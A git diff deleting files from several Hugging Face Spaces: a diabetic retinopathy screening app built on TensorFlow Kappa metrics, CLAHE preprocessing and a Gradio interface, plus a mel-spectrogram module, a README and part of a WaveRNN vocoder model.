- self.weight_mat = (col_mat - row_mat) ** 2
-
- def call(self, y_true, y_pred):
- y_true = tf.cast(y_true, dtype=self.col_label_vec.dtype)
- y_pred = tf.cast(y_pred, dtype=self.weight_mat.dtype)
- batch_size = tf.shape(y_true)[0]
- cat_labels = tf.matmul(y_true, self.col_label_vec)
- cat_label_mat = tf.tile(cat_labels, [1, self.num_classes])
- row_label_mat = tf.tile(self.row_label_vec, [batch_size, 1])
- if self.weightage == "linear":
- weight = tf.abs(cat_label_mat - row_label_mat)
- else:
- weight = (cat_label_mat - row_label_mat) ** 2
- numerator = tf.reduce_sum(weight * y_pred)
- label_dist = tf.reduce_sum(y_true, axis=0, keepdims=True)
- pred_dist = tf.reduce_sum(y_pred, axis=0, keepdims=True)
- w_pred_dist = tf.matmul(self.weight_mat, pred_dist, transpose_b=True)
- denominator = tf.reduce_sum(tf.matmul(label_dist, w_pred_dist))
- denominator /= tf.cast(batch_size, dtype=denominator.dtype)
- loss = tf.math.divide_no_nan(numerator, denominator)
- return tf.math.log(loss + self.epsilon)
-
- def get_config(self):
- config = {
- "num_classes": self.num_classes,
- "weightage": self.weightage,
- "epsilon": self.epsilon,
- }
- base_config = super().get_config()
- return {**base_config, **config}
-
-
-# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-# ==============================================================================
-"""Implements Cohen's Kappa."""
-
-import tensorflow as tf
-import numpy as np
-import tensorflow.keras.backend as K
-from tensorflow.keras.metrics import Metric
-from typing import Union
-FloatTensorLike = Union[tf.Tensor, float, np.float16, np.float32, np.float64]
-AcceptableDTypes = Union[tf.DType, np.dtype, type, int, str, None]
-
-from typeguard import typechecked
-from typing import Optional
-
-
-@tf.keras.utils.register_keras_serializable(package="Addons")
-class CohenKappa(Metric):
- """Computes Kappa score between two raters.
-
- The score lies in the range `[-1, 1]`. A score of -1 represents
- complete disagreement between two raters whereas a score of 1
- represents complete agreement between the two raters.
- A score of 0 means agreement by chance.
-
- Note: As of now, this implementation considers all labels
- while calculating the Cohen's Kappa score.
-
- Args:
- num_classes: Number of unique classes in your dataset.
- weightage: (optional) Weighting to be considered for calculating
- kappa statistics. A valid value is one of
- [None, 'linear', 'quadratic']. Defaults to `None`
- sparse_labels: (bool) Valid only for multi-class scenario.
- If True, ground truth labels are expected to be integers
- and not one-hot encoded.
- regression: (bool) If set, that means the problem is being treated
- as a regression problem where you are regressing the predictions.
- **Note:** If you are regressing for the values, the the output layer
- should contain a single unit.
- name: (optional) String name of the metric instance
- dtype: (optional) Data type of the metric result. Defaults to `None`.
-
- Raises:
- ValueError: If the value passed for `weightage` is invalid
- i.e. not any one of [None, 'linear', 'quadratic'].
-
- Usage:
-
- >>> y_true = np.array([4, 4, 3, 4, 2, 4, 1, 1], dtype=np.int32)
- >>> y_pred = np.array([4, 4, 3, 4, 4, 2, 1, 1], dtype=np.int32)
- >>> weights = np.array([1, 1, 2, 5, 10, 2, 3, 3], dtype=np.int32)
- >>> metric = tfa.metrics.CohenKappa(num_classes=5, sparse_labels=True)
- >>> metric.update_state(y_true , y_pred)
-
- >>> result = metric.result()
- >>> result.numpy()
- 0.61904764
- >>> # To use this with weights, sample_weight argument can be used.
- >>> metric = tfa.metrics.CohenKappa(num_classes=5, sparse_labels=True)
- >>> metric.update_state(y_true , y_pred , sample_weight=weights)
-
- >>> result = metric.result()
- >>> result.numpy()
- 0.37209308
-
- Usage with `tf.keras` API:
-
- >>> inputs = tf.keras.Input(shape=(10,))
- >>> x = tf.keras.layers.Dense(10)(inputs)
- >>> outputs = tf.keras.layers.Dense(1)(x)
- >>> model = tf.keras.models.Model(inputs=inputs, outputs=outputs)
- >>> model.compile('sgd', loss='mse', metrics=[tfa.metrics.CohenKappa(num_classes=3, sparse_labels=True)])
- """
-
- @typechecked
- def __init__(
- self,
- num_classes: FloatTensorLike,
- name: str = "cohen_kappa",
- weightage: Optional[str] = None,
- sparse_labels: bool = False,
- regression: bool = False,
- dtype: AcceptableDTypes = None,
- ):
- """Creates a `CohenKappa` instance."""
- super().__init__(name=name, dtype=dtype)
-
- if weightage not in (None, "linear", "quadratic"):
- raise ValueError("Unknown kappa weighting type.")
-
- if num_classes == 2:
- self._update = self._update_binary_class_model
- elif num_classes > 2:
- self._update = self._update_multi_class_model
- else:
- raise ValueError(
- """Number of classes must be
- greater than or euqal to two"""
- )
-
- self.weightage = weightage
- self.num_classes = num_classes
- self.regression = regression
- self.sparse_labels = sparse_labels
- self.conf_mtx = self.add_weight(
- "conf_mtx",
- shape=(self.num_classes, self.num_classes),
- initializer=tf.keras.initializers.zeros,
- dtype=tf.float32,
- )
-
- def update_state(self, y_true, y_pred, sample_weight=None):
- """Accumulates the confusion matrix condition statistics.
-
- Args:
- y_true: Labels assigned by the first annotator with shape
- `[num_samples,]`.
- y_pred: Labels assigned by the second annotator with shape
- `[num_samples,]`. The kappa statistic is symmetric,
- so swapping `y_true` and `y_pred` doesn't change the value.
- sample_weight (optional): for weighting labels in confusion matrix
- Defaults to `None`. The dtype for weights should be the same
- as the dtype for confusion matrix. For more details,
- please check `tf.math.confusion_matrix`.
-
- Returns:
- Update op.
- """
- return self._update(y_true, y_pred, sample_weight)
-
- def _update_binary_class_model(self, y_true, y_pred, sample_weight=None):
- y_true = tf.cast(y_true, dtype=tf.int64)
- y_pred = tf.cast(y_pred, dtype=tf.float32)
- y_pred = tf.cast(y_pred > 0.5, dtype=tf.int64)
- return self._update_confusion_matrix(y_true, y_pred, sample_weight)
-
- @tf.function
- def _update_multi_class_model(self, y_true, y_pred, sample_weight=None):
- v = tf.argmax(y_true, axis=1) if not self.sparse_labels else y_true
- y_true = tf.cast(v, dtype=tf.int64)
-
- y_pred = self._cast_ypred(y_pred)
-
- return self._update_confusion_matrix(y_true, y_pred, sample_weight)
-
- @tf.function
- def _cast_ypred(self, y_pred):
- if tf.rank(y_pred) > 1:
- if not self.regression:
- y_pred = tf.cast(tf.argmax(y_pred, axis=-1), dtype=tf.int64)
- else:
- y_pred = tf.math.round(tf.math.abs(y_pred))
- y_pred = tf.cast(y_pred, dtype=tf.int64)
- else:
- y_pred = tf.cast(y_pred, dtype=tf.int64)
- return y_pred
-
- @tf.function
- def _safe_squeeze(self, y):
- y = tf.squeeze(y)
-
- # Check for scalar result
- if tf.rank(y) == 0:
- y = tf.expand_dims(y, 0)
-
- return y
-
- def _update_confusion_matrix(self, y_true, y_pred, sample_weight):
- y_true = self._safe_squeeze(y_true)
- y_pred = self._safe_squeeze(y_pred)
-
- new_conf_mtx = tf.math.confusion_matrix(
- labels=y_true,
- predictions=y_pred,
- num_classes=self.num_classes,
- weights=sample_weight,
- dtype=tf.float32,
- )
-
- return self.conf_mtx.assign_add(new_conf_mtx)
-
- def result(self):
- nb_ratings = tf.shape(self.conf_mtx)[0]
- weight_mtx = tf.ones([nb_ratings, nb_ratings], dtype=tf.float32)
-
- # 2. Create a weight matrix
- if self.weightage is None:
- diagonal = tf.zeros([nb_ratings], dtype=tf.float32)
- weight_mtx = tf.linalg.set_diag(weight_mtx, diagonal=diagonal)
- else:
- weight_mtx += tf.cast(tf.range(nb_ratings), dtype=tf.float32)
- weight_mtx = tf.cast(weight_mtx, dtype=self.dtype)
-
- if self.weightage == "linear":
- weight_mtx = tf.abs(weight_mtx - tf.transpose(weight_mtx))
- else:
- weight_mtx = tf.pow((weight_mtx - tf.transpose(weight_mtx)), 2)
-
- weight_mtx = tf.cast(weight_mtx, dtype=self.dtype)
-
- # 3. Get counts
- actual_ratings_hist = tf.reduce_sum(self.conf_mtx, axis=1)
- pred_ratings_hist = tf.reduce_sum(self.conf_mtx, axis=0)
-
- # 4. Get the outer product
- out_prod = pred_ratings_hist[..., None] * actual_ratings_hist[None, ...]
-
- # 5. Normalize the confusion matrix and outer product
- conf_mtx = self.conf_mtx / tf.reduce_sum(self.conf_mtx)
- out_prod = out_prod / tf.reduce_sum(out_prod)
-
- conf_mtx = tf.cast(conf_mtx, dtype=self.dtype)
- out_prod = tf.cast(out_prod, dtype=self.dtype)
-
- # 6. Calculate Kappa score
- numerator = tf.reduce_sum(conf_mtx * weight_mtx)
- denominator = tf.reduce_sum(out_prod * weight_mtx)
- return tf.cond(
- tf.math.is_nan(denominator),
- true_fn=lambda: 0.0,
- false_fn=lambda: 1 - (numerator / denominator),
- )
-
- def get_config(self):
- """Returns the serializable config of the metric."""
-
- config = {
- "num_classes": self.num_classes,
- "weightage": self.weightage,
- "sparse_labels": self.sparse_labels,
- "regression": self.regression,
- }
- base_config = super().get_config()
- return {**base_config, **config}
-
- def reset_state(self):
- """Resets all of the metric state variables."""
-
- for v in self.variables:
- K.set_value(
- v,
- np.zeros((self.num_classes, self.num_classes), v.dtype.as_numpy_dtype),
- )
-
- def reset_states(self):
- # Backwards compatibility alias of `reset_state`. New classes should
- # only implement `reset_state`.
- # Required in Tensorflow < 2.5.0
- return self.reset_state()
-
-
-# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-# ==============================================================================
-"""Implements Multi-label confusion matrix scores."""
-
-import warnings
-
-import tensorflow as tf
-from tensorflow.keras import backend as K
-from tensorflow.keras.metrics import Metric
-import numpy as np
-
-from typeguard import typechecked
-
-
-class MultiLabelConfusionMatrix(Metric):
- """Computes Multi-label confusion matrix.
-
- Class-wise confusion matrix is computed for the
- evaluation of classification.
-
- If multi-class input is provided, it will be treated
- as multilabel data.
-
- Consider classification problem with two classes
- (i.e num_classes=2).
-
- Resultant matrix `M` will be in the shape of `(num_classes, 2, 2)`.
-
- Every class `i` has a dedicated matrix of shape `(2, 2)` that contains:
-
- - true negatives for class `i` in `M(0,0)`
- - false positives for class `i` in `M(0,1)`
- - false negatives for class `i` in `M(1,0)`
- - true positives for class `i` in `M(1,1)`
-
- Args:
- num_classes: `int`, the number of labels the prediction task can have.
- name: (Optional) string name of the metric instance.
- dtype: (Optional) data type of the metric result.
-
- Usage:
-
- >>> # multilabel confusion matrix
- >>> y_true = np.array([[1, 0, 1], [0, 1, 0]], dtype=np.int32)
- >>> y_pred = np.array([[1, 0, 0], [0, 1, 1]], dtype=np.int32)
- >>> metric = tfa.metrics.MultiLabelConfusionMatrix(num_classes=3)
- >>> metric.update_state(y_true, y_pred)
- >>> result = metric.result()
- >>> result.numpy() #doctest: -DONT_ACCEPT_BLANKLINE
- array([[[1., 0.],
- [0., 1.]],
-
- [[1., 0.],
- [0., 1.]],
-
- [[0., 1.],
- [1., 0.]]], dtype=float32)
- >>> # if multiclass input is provided
- >>> y_true = np.array([[1, 0, 0], [0, 1, 0]], dtype=np.int32)
- >>> y_pred = np.array([[1, 0, 0], [0, 0, 1]], dtype=np.int32)
- >>> metric = tfa.metrics.MultiLabelConfusionMatrix(num_classes=3)
- >>> metric.update_state(y_true, y_pred)
- >>> result = metric.result()
- >>> result.numpy() #doctest: -DONT_ACCEPT_BLANKLINE
- array([[[1., 0.],
- [0., 1.]],
-
- [[1., 0.],
- [1., 0.]],
-
- [[1., 1.],
- [0., 0.]]], dtype=float32)
-
- """
-
- @typechecked
- def __init__(
- self,
- num_classes: FloatTensorLike,
- name: str = "Multilabel_confusion_matrix",
- dtype: AcceptableDTypes = None,
- **kwargs,
- ):
- super().__init__(name=name, dtype=dtype)
- self.num_classes = num_classes
- self.true_positives = self.add_weight(
- "true_positives",
- shape=[self.num_classes],
- initializer="zeros",
- dtype=self.dtype,
- )
- self.false_positives = self.add_weight(
- "false_positives",
- shape=[self.num_classes],
- initializer="zeros",
- dtype=self.dtype,
- )
- self.false_negatives = self.add_weight(
- "false_negatives",
- shape=[self.num_classes],
- initializer="zeros",
- dtype=self.dtype,
- )
- self.true_negatives = self.add_weight(
- "true_negatives",
- shape=[self.num_classes],
- initializer="zeros",
- dtype=self.dtype,
- )
-
- def update_state(self, y_true, y_pred, sample_weight=None):
- if sample_weight is not None:
- warnings.warn(
- "`sample_weight` is not None. Be aware that MultiLabelConfusionMatrix "
- "does not take `sample_weight` into account when computing the metric "
- "value."
- )
-
- y_true = tf.cast(y_true, tf.int32)
- y_pred = tf.cast(y_pred, tf.int32)
- # true positive
- true_positive = tf.math.count_nonzero(y_true * y_pred, 0)
- # predictions sum
- pred_sum = tf.math.count_nonzero(y_pred, 0)
- # true labels sum
- true_sum = tf.math.count_nonzero(y_true, 0)
- false_positive = pred_sum - true_positive
- false_negative = true_sum - true_positive
- y_true_negative = tf.math.not_equal(y_true, 1)
- y_pred_negative = tf.math.not_equal(y_pred, 1)
- true_negative = tf.math.count_nonzero(
- tf.math.logical_and(y_true_negative, y_pred_negative), axis=0
- )
-
- # true positive state update
- self.true_positives.assign_add(tf.cast(true_positive, self.dtype))
- # false positive state update
- self.false_positives.assign_add(tf.cast(false_positive, self.dtype))
- # false negative state update
- self.false_negatives.assign_add(tf.cast(false_negative, self.dtype))
- # true negative state update
- self.true_negatives.assign_add(tf.cast(true_negative, self.dtype))
-
- def result(self):
- flat_confusion_matrix = tf.convert_to_tensor(
- [
- self.true_negatives,
- self.false_positives,
- self.false_negatives,
- self.true_positives,
- ]
- )
- # reshape into 2*2 matrix
- confusion_matrix = tf.reshape(tf.transpose(flat_confusion_matrix), [-1, 2, 2])
-
- return confusion_matrix
-
- def get_config(self):
- """Returns the serializable config of the metric."""
-
- config = {
- "num_classes": self.num_classes,
- }
- base_config = super().get_config()
- return {**base_config, **config}
-
- def reset_state(self):
- reset_value = np.zeros(self.num_classes, dtype=np.int32)
- K.batch_set_value([(v, reset_value) for v in self.variables])
-
- def reset_states(self):
- # Backwards compatibility alias of `reset_state`. New classes should
- # only implement `reset_state`.
- # Required in Tensorflow < 2.5.0
- return self.reset_state()
-#####
-
-IMAGE_SIZE = 128
-NUM_CLASSES = 3
-
-def preprocess_image(image, target_size, add_clahe=True, clip_limit=4, tile_grid_size=(40,40), all_clahe=True):
- """
- Preprocess the images to remove black borders
- and improve contrast using Y channel and CLAHE
- """
- try:
- # Crop the image to remove black borders
- cropped_rgb_image = remove_black_borders(image)
-
- if add_clahe:
- equalised_image = apply_clahe(
- cropped_rgb_image, clip_limit, tile_grid_size, all_clahe)
-
- # Resize the image to target size
- resized_image = cv2.resize(equalised_image, (target_size, target_size))
- else:
- # Resize the image to target size
- resized_image = cv2.resize(cropped_rgb_image, (target_size, target_size))
-
- return resized_image
-
- except Exception as e:
- print("Error processing image: ")
- print(e)
-
-
-def remove_black_borders(image):
- """
- Crop the image to remove black borders
- """
- green_channel_image = image[:, :, 1]
-
- # Find the contours in the green channel
- contours, _ = cv2.findContours(
- green_channel_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
-
- # Find the largest contour
- largest_contour = max(contours, key=cv2.contourArea)
-
- # Get the bounding rectangle of the largest contour
- x, y, w, h = cv2.boundingRect(largest_contour)
-
- # Create a mask with the same size as the bounding rectangle
- mask = np.zeros((h, w), np.uint8)
-
- # Draw the largest contour on the mask
- cv2.drawContours(mask, [largest_contour - [x, y]], 0, 255, -1)
-
- # Convert the mask to a 3 channel image
- mask_3_channel = cv2.merge([mask, mask, mask])
-
- # Crop the image using the mask
- cropped_image = cv2.bitwise_and(image[y:y+h, x:x+w], mask_3_channel)
-
- return cropped_image
-
-
-def apply_clahe(image, clip_limit=4, tile_grid_size=(40,40), all_clahe=False):
- """
- Preprocess the image
- """
- try:
- # Extract the y channel from the cropped rgb image
- yuv_image = cv2.cvtColor(image, cv2.COLOR_RGB2YUV)
- cropped_y_channel_image = yuv_image[:, :, 0]
-
- # Apply CLAHE to the y channel of the cropped image
- clahe = cv2.createCLAHE(clipLimit=clip_limit, tileGridSize=tile_grid_size)
- enhanced_y_channel = clahe.apply(cropped_y_channel_image)
-
- if all_clahe:
- cropped_u_channel = yuv_image[:, :, 1]
- enhanced_u_channel = clahe.apply(cropped_u_channel)
- cropped_v_channel = yuv_image[:, :, 2]
- enhanced_v_channel = clahe.apply(cropped_v_channel)
-
- enhanced_yuv_image = np.stack([enhanced_y_channel, enhanced_u_channel, enhanced_v_channel], axis=-1)
-
- # Convert YUV to RGB
- enhanced_rgb_image = cv2.cvtColor(enhanced_yuv_image, cv2.COLOR_YUV2RGB)
-
- return enhanced_rgb_image
- else:
- # Convert the y channel image to grayscale
- enhanced_grayscale_image = cv2.convertScaleAbs(enhanced_y_channel, alpha=(255/219))
-
- # Repeat the equalised grayscale for all 3-channels
- enhanced_grayscale_3_channels = np.stack((enhanced_grayscale_image,) * 3, axis=-1)
-
- return enhanced_grayscale_3_channels
-
- except Exception as e:
- print("Error processing image: ", e)
-
-
-def load_vgg16_model():
- vgg16_DR = tf.keras.models.load_model('./VGG16_32_128_CLAHE_4_40_trainableFalse.h5', custom_objects={
- 'WeightedKappaLoss': tfa.losses.WeightedKappaLoss,
- 'CohenKappa': tfa.metrics.CohenKappa,
- 'F1Score': tf.keras.metrics.F1Score,
- 'MultiLabelConfusionMatrix': tfa.metrics.MultiLabelConfusionMatrix
- })
- return vgg16_DR
-
-
-def predict_input_image(img):
- img = preprocess_image(img, IMAGE_SIZE, add_clahe=True, clip_limit=4, tile_grid_size=(40,40), all_clahe=False)
- img_4d=img.reshape(-1, IMAGE_SIZE, IMAGE_SIZE, 3)
- model = load_vgg16_model()
- prediction=model.predict([img_4d])[0]
-
- dr_classes = ['No DR', 'Mild DR', 'Referable DR']
- return {dr_classes[i]: float(prediction[i]) for i in range(3)}
-
-image = gr.inputs.Image(shape=(IMAGE_SIZE, IMAGE_SIZE))
-label = gr.outputs.Label(num_top_classes=NUM_CLASSES)
-examples_dir = './example_images'
-iface = gr.Interface(
- fn=predict_input_image,
- inputs=image,
- outputs=label,
- title="Diabetic Retinopathy (DR) Screener",
- description="Submit a retinal image to classify it into No DR, Mild DR, or Referable DR (Moderate/Severe/Proliferative DR)\n- No DR: Rescreen in 12 months.\n- Mild DR: Rescreen in 6 months but be mindful of your sugar level to delay symptoms.\n- Referable DR: Please visit an eye specialist immediately!",
- article="Note that this Deep Neural Network (DNN) model has an 89% Quadratic Weighted Kappa (QWK) score and 87% Sensitivity and as such, may not always be correct.\nPlease consult an eye specialist to validate the results. If you're an eyecare professional, please help improve the model by flagging incorrect predictions for future model retraining. Thank you!",
- examples=examples_dir,
- allow_flagging="manual",
- flagging_options=["Incorrect! Should be Referable DR", "Incorrect! Should be Mild DR", "Incorrect! Should be No DR", "Ambiguous"]
-)
-iface.launch()
\ No newline at end of file
diff --git a/spaces/Mahiruoshi/MyGO_VIts-bert/mel_processing.py b/spaces/Mahiruoshi/MyGO_VIts-bert/mel_processing.py
deleted file mode 100644
index aab5bd926a194610b7ce3da29c553bd877341aa4..0000000000000000000000000000000000000000
--- a/spaces/Mahiruoshi/MyGO_VIts-bert/mel_processing.py
+++ /dev/null
@@ -1,139 +0,0 @@
-import torch
-import torch.utils.data
-from librosa.filters import mel as librosa_mel_fn
-
-MAX_WAV_VALUE = 32768.0
-
-
-def dynamic_range_compression_torch(x, C=1, clip_val=1e-5):
- """
- PARAMS
- ------
- C: compression factor
- """
- return torch.log(torch.clamp(x, min=clip_val) * C)
-
-
-def dynamic_range_decompression_torch(x, C=1):
- """
- PARAMS
- ------
- C: compression factor used to compress
- """
- return torch.exp(x) / C
-
-
-def spectral_normalize_torch(magnitudes):
- output = dynamic_range_compression_torch(magnitudes)
- return output
-
-
-def spectral_de_normalize_torch(magnitudes):
- output = dynamic_range_decompression_torch(magnitudes)
- return output
-
-
-mel_basis = {}
-hann_window = {}
-
-
-def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False):
- if torch.min(y) < -1.0:
- print("min value is ", torch.min(y))
- if torch.max(y) > 1.0:
- print("max value is ", torch.max(y))
-
- global hann_window
- dtype_device = str(y.dtype) + "_" + str(y.device)
- wnsize_dtype_device = str(win_size) + "_" + dtype_device
- if wnsize_dtype_device not in hann_window:
- hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(
- dtype=y.dtype, device=y.device
- )
-
- y = torch.nn.functional.pad(
- y.unsqueeze(1),
- (int((n_fft - hop_size) / 2), int((n_fft - hop_size) / 2)),
- mode="reflect",
- )
- y = y.squeeze(1)
-
- spec = torch.stft(
- y,
- n_fft,
- hop_length=hop_size,
- win_length=win_size,
- window=hann_window[wnsize_dtype_device],
- center=center,
- pad_mode="reflect",
- normalized=False,
- onesided=True,
- return_complex=False,
- )
-
- spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6)
- return spec
-
-
-def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax):
- global mel_basis
- dtype_device = str(spec.dtype) + "_" + str(spec.device)
- fmax_dtype_device = str(fmax) + "_" + dtype_device
- if fmax_dtype_device not in mel_basis:
- mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax)
- mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(
- dtype=spec.dtype, device=spec.device
- )
- spec = torch.matmul(mel_basis[fmax_dtype_device], spec)
- spec = spectral_normalize_torch(spec)
- return spec
-
-
-def mel_spectrogram_torch(
- y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False
-):
- if torch.min(y) < -1.0:
- print("min value is ", torch.min(y))
- if torch.max(y) > 1.0:
- print("max value is ", torch.max(y))
-
- global mel_basis, hann_window
- dtype_device = str(y.dtype) + "_" + str(y.device)
- fmax_dtype_device = str(fmax) + "_" + dtype_device
- wnsize_dtype_device = str(win_size) + "_" + dtype_device
- if fmax_dtype_device not in mel_basis:
- mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax)
- mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(
- dtype=y.dtype, device=y.device
- )
- if wnsize_dtype_device not in hann_window:
- hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(
- dtype=y.dtype, device=y.device
- )
-
- y = torch.nn.functional.pad(
- y.unsqueeze(1),
- (int((n_fft - hop_size) / 2), int((n_fft - hop_size) / 2)),
- mode="reflect",
- )
- y = y.squeeze(1)
-
- spec = torch.stft(
- y,
- n_fft,
- hop_length=hop_size,
- win_length=win_size,
- window=hann_window[wnsize_dtype_device],
- center=center,
- pad_mode="reflect",
- normalized=False,
- onesided=True,
- return_complex=False,
- )
-
- spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6)
-
- spec = torch.matmul(mel_basis[fmax_dtype_device], spec)
- spec = spectral_normalize_torch(spec)
-
- return spec
diff --git a/spaces/Mahmoud7/mobile_price_prediction/README.md b/spaces/Mahmoud7/mobile_price_prediction/README.md
deleted file mode 100644
index 3080ce642b0a2a5182a2336c3442348bf33aa8eb..0000000000000000000000000000000000000000
--- a/spaces/Mahmoud7/mobile_price_prediction/README.md
+++ /dev/null
@@ -1,12 +0,0 @@
----
-title: Mobile Price Prediction
-emoji: 📚
-colorFrom: yellow
-colorTo: blue
-sdk: streamlit
-sdk_version: 1.15.2
-app_file: app.py
-pinned: false
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/Marne/MockingBird/mockingbirdforuse/vocoder/wavernn/models/fatchord_version.py b/spaces/Marne/MockingBird/mockingbirdforuse/vocoder/wavernn/models/fatchord_version.py
deleted file mode 100644
index e20aa221c9b9d7f008c93fc5a9b56a43919c5e8a..0000000000000000000000000000000000000000
--- a/spaces/Marne/MockingBird/mockingbirdforuse/vocoder/wavernn/models/fatchord_version.py
+++ /dev/null
@@ -1,445 +0,0 @@
-import time
-import torch
-import numpy as np
-import torch.nn as nn
-import torch.nn.functional as F
-from torch.nn.parameter import Parameter
-
-from ..audio import de_emphasis, decode_mu_law
-from ..hparams import hparams as hp
-from ...distribution import sample_from_discretized_mix_logistic
-from ....log import logger
-
-
-class ResBlock(nn.Module):
- def __init__(self, dims):
- super().__init__()
- self.conv1 = nn.Conv1d(dims, dims, kernel_size=1, bias=False)
- self.conv2 = nn.Conv1d(dims, dims, kernel_size=1, bias=False)
- self.batch_norm1 = nn.BatchNorm1d(dims)
- self.batch_norm2 = nn.BatchNorm1d(dims)
-
- def forward(self, x):
- residual = x
- x = self.conv1(x)
- x = self.batch_norm1(x)
- x = F.relu(x)
- x = self.conv2(x)
- x = self.batch_norm2(x)
- return x + residual
-
-
-class MelResNet(nn.Module):
- def __init__(self, res_blocks, in_dims, compute_dims, res_out_dims, pad):
- super().__init__()
- k_size = pad * 2 + 1
- self.conv_in = nn.Conv1d(in_dims, compute_dims, kernel_size=k_size, bias=False)
- self.batch_norm = nn.BatchNorm1d(compute_dims)
- self.layers = nn.ModuleList()
- for i in range(res_blocks):
- self.layers.append(ResBlock(compute_dims))
- self.conv_out = nn.Conv1d(compute_dims, res_out_dims, kernel_size=1)
-
- def forward(self, x):
- x = self.conv_in(x)
- x = self.batch_norm(x)
- x = F.relu(x)
- for f in self.layers:
- x = f(x)
- x = self.conv_out(x)
- return x
-
-
-class Stretch2d(nn.Module):
- def __init__(self, x_scale, y_scale):
- super().__init__()
- self.x_scale = x_scale
- self.y_scale = y_scale
-
- def forward(self, x):
- b, c, h, w = x.size()
- x = x.unsqueeze(-1).unsqueeze(3)
- x = x.repeat(1, 1, 1, self.y_scale, 1, self.x_scale)
- return x.view(b, c, h * self.y_scale, w * self.x_scale)
-
-
-class UpsampleNetwork(nn.Module):
- def __init__(
- self, feat_dims, upsample_scales, compute_dims, res_blocks, res_out_dims, pad
- ):
- super().__init__()
- total_scale = np.cumproduct(upsample_scales)[-1]
- self.indent = pad * total_scale
- self.resnet = MelResNet(res_blocks, feat_dims, compute_dims, res_out_dims, pad)
- self.resnet_stretch = Stretch2d(total_scale, 1)
- self.up_layers = nn.ModuleList()
- for scale in upsample_scales:
- k_size = (1, scale * 2 + 1)
- padding = (0, scale)
- stretch = Stretch2d(scale, 1)
- conv = nn.Conv2d(1, 1, kernel_size=k_size, padding=padding, bias=False)
- conv.weight.data.fill_(1.0 / k_size[1])
- self.up_layers.append(stretch)
- self.up_layers.append(conv)
-
- def forward(self, m):
- aux = self.resnet(m).unsqueeze(1)
- aux = self.resnet_stretch(aux)
- aux = aux.squeeze(1)
- m = m.unsqueeze(1)
- for f in self.up_layers:
- m = f(m)
- m = m.squeeze(1)[:, :, self.indent : -self.indent]
- return m.transpose(1, 2), aux.transpose(1, 2)
-
-
-class WaveRNN(nn.Module):
- def __init__(
- self,
- rnn_dims,
- fc_dims,
- bits,
- pad,
- upsample_factors,
- feat_dims,
- compute_dims,
- res_out_dims,
- res_blocks,
- hop_length,
- sample_rate,
- mode="RAW",
- ):
- super().__init__()
- self.mode = mode
- self.pad = pad
- if self.mode == "RAW":
- self.n_classes = 2**bits
- elif self.mode == "MOL":
- self.n_classes = 30
- else:
- RuntimeError("Unknown model mode value - ", self.mode)
-
- self.rnn_dims = rnn_dims
- self.aux_dims = res_out_dims // 4
- self.hop_length = hop_length
- self.sample_rate = sample_rate
-
- self.upsample = UpsampleNetwork(
- feat_dims, upsample_factors, compute_dims, res_blocks, res_out_dims, pad
- )
- self.I = nn.Linear(feat_dims + self.aux_dims + 1, rnn_dims)
- self.rnn1 = nn.GRU(rnn_dims, rnn_dims, batch_first=True)
- self.rnn2 = nn.GRU(rnn_dims + self.aux_dims, rnn_dims, batch_first=True)
- self.fc1 = nn.Linear(rnn_dims + self.aux_dims, fc_dims)
- self.fc2 = nn.Linear(fc_dims + self.aux_dims, fc_dims)
- self.fc3 = nn.Linear(fc_dims, self.n_classes)
-
- self.step = Parameter(torch.zeros(1).long(), requires_grad=False)
- self.num_params()
-
- def forward(self, x, mels):
- self.step += 1
- bsize = x.size(0)
- if torch.cuda.is_available():
- h1 = torch.zeros(1, bsize, self.rnn_dims).cuda()
- h2 = torch.zeros(1, bsize, self.rnn_dims).cuda()
- else:
- h1 = torch.zeros(1, bsize, self.rnn_dims).cpu()
- h2 = torch.zeros(1, bsize, self.rnn_dims).cpu()
- mels, aux = self.upsample(mels)
-
- aux_idx = [self.aux_dims * i for i in range(5)]
- a1 = aux[:, :, aux_idx[0] : aux_idx[1]]
- a2 = aux[:, :, aux_idx[1] : aux_idx[2]]
- a3 = aux[:, :, aux_idx[2] : aux_idx[3]]
- a4 = aux[:, :, aux_idx[3] : aux_idx[4]]
-
- x = torch.cat([x.unsqueeze(-1), mels, a1], dim=2)
- x = self.I(x)
- res = x
- x, _ = self.rnn1(x, h1)
-
- x = x + res
- res = x
- x = torch.cat([x, a2], dim=2)
- x, _ = self.rnn2(x, h2)
-
- x = x + res
- x = torch.cat([x, a3], dim=2)
- x = F.relu(self.fc1(x))
-
- x = torch.cat([x, a4], dim=2)
- x = F.relu(self.fc2(x))
- return self.fc3(x)
-
- def generate(self, mels, batched, target, overlap, mu_law):
- mu_law = mu_law if self.mode == "RAW" else False
-
- self.eval()
- output = []
- start = time.time()
- rnn1 = self.get_gru_cell(self.rnn1)
- rnn2 = self.get_gru_cell(self.rnn2)
-
- with torch.no_grad():
- if torch.cuda.is_available():
- mels = mels.cuda()
- else:
- mels = mels.cpu()
